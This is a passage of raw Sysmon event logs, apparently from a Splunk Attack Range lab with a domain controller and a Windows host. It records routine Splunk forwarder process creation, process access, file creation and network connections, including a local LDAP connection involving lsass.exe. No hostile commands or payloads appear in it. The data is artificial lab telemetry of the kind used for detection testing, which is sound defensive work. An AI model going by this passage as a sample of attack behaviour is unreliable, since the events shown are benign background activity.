Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68F9A3BDD717E273876952338A8D35A5,SHA256=988725CF0187985C4B794CFE88680DEFEC644D959AD018744743BE9928CC04E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223181Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:02.393{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AB3400DA4DB4663C8B0F437A57EE406,SHA256=BCA0E897FC4F4A08DBB26843F79FB3C37DA374B7BF713C1C4936B18F76A89C76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299309Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:02.437{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46AA4B7A4F73959FD849B75C8388B329,SHA256=067F1FC58F2AC5788B77890B7FD4F6CE892B0BF0BE4452C3D0FE4B63B64EE5C4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000299308Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:02.437{C8EA50B7-1A06-6216-7707-000000003802}52885676C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299307Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:02.153{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1A06-6216-7707-000000003802}5288C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299306Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:02.153{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299305Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:02.153{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299304Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:02.153{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299303Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:02.153{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299302Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:02.153{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-1A06-6216-7707-000000003802}5288C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000299301Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:02.153{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1A06-6216-7707-000000003802}5288C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000299300Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:02.154{C8EA50B7-1A06-6216-7707-000000003802}5288C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000223182Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:03.611{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2DB1B43DDA009E8ECC66E96AF3B7AF5,SHA256=8D3762DD53D38E133F002BAD6374B985F1D23118EC04B4A063A878F1677CD5AD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000299319Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:03.521{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1A07-6216-7807-000000003802}6240C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299318Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:03.521{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299317Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:03.521{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299316Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:03.521{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299315Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:03.521{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299314Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:03.521{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-1A07-6216-7807-000000003802}6240C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000299313Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:03.521{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1A07-6216-7807-000000003802}6240C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000299312Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:03.523{C8EA50B7-1A07-6216-7807-000000003802}6240C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000299311Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:03.453{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA85A06E95119837158D8F69449FDC8F,SHA256=C555E4C025AEE672CB36D248520C4CBA4BC36882224853D1C5E67FD35CD31783,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299310Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:00.683{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49602-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000223183Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:04.689{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=764C8832586AB45A9C2FF2E9827A1FBB,SHA256=F1D4E98B6F38929EBD22EAD9E053148994E1D217E17C62070F6AA649EA3760CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299320Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:04.453{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A60BA90D4C2DE58C4D8782FB7141DA5,SHA256=78EF69164051AFDA27F1D14E29FDF779AAB5192C7A82266BA0E9470669A08019,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299323Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:05.469{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7EB414FA01B2987FC4A2612E1296F57,SHA256=ABD9749F649DE4BEC5BBD80607AE708C92536CE654C1DD38BA4A45230B30ACCC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223184Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:05.720{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49A35FE47E4976D07995ED57C46E2340,SHA256=90A3C192F8FE1A774EC005C9532A8B6E9D5B1EAE5865C88D8E0F0E12920106AC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299322Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:03.600{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49603-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000299321Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:03.600{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49603-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000299324Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:06.484{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BFB7009CADEA0006730E179FE4029E95,SHA256=CB33F89D7B1BC9BD490DA953FE8ED70A0386E9640E2892AFBF452A23F037E0E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223185Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:06.767{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B716AE3B7F9921FC7464CB7954C8F28,SHA256=A8FBD231F67CA57FD89AE9CEEE678E3567ADA094E24B2BA57F10897FFF571BF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223187Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:07.784{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F302EDA96154A8A81A6749A532464D2D,SHA256=D8C14AF410B15B8365AA9D84CF3DF4B31F04777E3EE7B59E947BDE627F778CB5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299325Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:07.504{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E82DDC37FEFA9DA81C1726A3EADF352D,SHA256=D973582B0FF0183E9352AAAC485F9A879868D4F96C1FDD86F3F1604DCB44EAB0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223186Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:05.459{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51767-false10.0.1.12-8000- 23542300x8000000000000000223188Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:08.814{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE953A84C404F6CFE59DA5D7DE1064AF,SHA256=CBDFCB020BB9D4A3C689F85174840682094EB4439B4155F45D22BF364A4445D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299327Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:08.521{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A52532E2B67DDF6A7D957441CB018CD,SHA256=ED5620FF14610164D0D48128B80D985D1F9067D846044FB9E27518689EBFDF42,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299326Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:06.661{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49604-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000223189Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:09.845{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 